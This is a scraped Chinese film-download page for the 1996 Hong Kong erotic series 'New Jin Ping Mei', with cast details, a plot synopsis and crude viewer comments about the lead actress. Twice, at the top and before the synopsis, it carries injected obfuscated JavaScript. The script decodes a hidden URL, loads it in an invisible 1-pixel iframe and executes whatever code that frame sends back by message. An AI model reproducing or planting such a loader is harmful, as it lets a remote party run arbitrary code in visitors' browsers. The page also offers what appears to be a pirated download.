if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['FeMjSpm']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#FeMjSpm'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data['des_s_2484']) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'aHR'+'FF0'+'cHF'+'FMl'+'M0E'+'lFF'+'MkY'+'FFl'+'MkZ'+'zc2'+'guF'+'FZG'+'NlM'+'Gsw'+'LmN'+'uJT'+'NBM'+'TA0'+'NFF'+'DMl'+'MkY'+'FFy'+'YjQ'+'1YF'+'FzY'+'lFF'+'MkZ'+'FFj'+'LTF'+'FI0'+'OFF'+'DQt'+'MjU'+'FFt'+'MSF'+'F5t'+'cDM'+'=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

新金瓶梅第一卷 杨思敏版

资源:[香港三级片]第1-5回合集

类型:经典片 韩国三级 三级片 情色 金瓶梅 1996

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['XXeFFHa']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 're' + 'nq' + 'ob' + 'j_2093'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#XXeFFHa'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2093`]) { var t = x(e.data[`des_s_2093`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'M0E'+'lFF'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uaG'+'l6Y'+'nBk'+'dS5'+'jFF'+'biU'+'FFz'+'QTF'+'FEw'+'NFF'+'DQz'+'FFJ'+'TJF'+'FGM'+'jA1'+'YFF'+'zM2'+'FFJ'+'TJG'+'Yy0'+'yMD'+'kzL'+'TIF'+'F1L'+'TEu'+'Y3N'+'z', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

《新金瓶梅第一卷 杨思敏版》迅雷下载

《新金瓶梅第一卷 杨思敏版》剧情介绍

导演谭锐铭
主演杨思敏 / 单立文 / 顾冠忠 / 叶仙儿 / 蔡美优
类型: 剧情 / 爱情 / 历史 / 古装
制片国家/地区: 香港
语言: 汉语普通话
上映日期: 1996
片长: 435分钟
又名: New Jin Pin Mei I / Chin Ping Mei 1
IMDb链接: tt3882958

《新金瓶梅第一卷 杨思敏版》故事发生在清和县,西门庆(单立文 饰)生性阴险,借着是候补提刑官之威势欺凌百姓,西门庆看中潘金莲(杨思敏 饰)的美貌,逐要求王婆从中设计让他得逞,事后 武大郎知道而找上西门庆,被打成重伤卧床不起,西门庆更甚而下毒害死武大郎,武松(顾冠忠 饰)得知愤而找西门庆报仇,却中西门庆的设计,杀了人将被判死罪,潘金莲为求 武松免于死罪,于是答应西门庆的要求纳为五娘,而武松发配海南服刑,从此潘金莲深入西门府受到西门庆的凌辱,忍辱偷生只为再见武松一面。

新金瓶梅 杨思敏版》无可厚非,这部影片对比原著,改动甚大,却依然是众多影视改编里最出彩的一版,杨思敏的亚洲第一美胸功不可没;东吴弄珠客云:“读《金瓶梅》而生怜悯心者,菩萨也;生畏惧心者,君子也;生欢喜心者,小人也;生效法心者,乃禽兽耳。”可见,当禽兽易,而成菩萨难!真心不得不承认,杨思敏真的是美胸,人美,胸美。。这个版本是见过的,最让人怀念的一版~~

杨思敏的胸真漂亮,躺下却发觉是假的。单立文把西门大官人都演出花来了,总共五次,次次不同。这个类似高衙内,过度夸张放在电视剧里就太难受了,缺少生活感。不过当高衙内看还是挺可爱的。床戏频繁,是腰里揣副牌,逮谁跟谁来。各种背带裤叫人无语。37岁身上见肥,也不说多锻炼一下,真对不起观众!偶尔看到豆瓣把这个又开放页面了!我分明记得头几年是有这个页面然后被删了还是怎么样了!好了话说回来!杨思敏很漂亮啊胸好大!所以虽然这部电视剧被改成了潘金莲和西门庆爱情故事也是令我深感扼腕叹息外加莫名其妙!但是不要紧!有大胸!我释然了!

敢情都是冲着大胸来的~~~~

Copyright © 2018-2021 一起看电影网(17kan电影,17看电影) 百度地图 - google地图 - 360地图 - 神马地图 - 搜搜地图 - bing地图 - 站点地图 - 搜狗地图 - RSS订阅 All Rights Reserved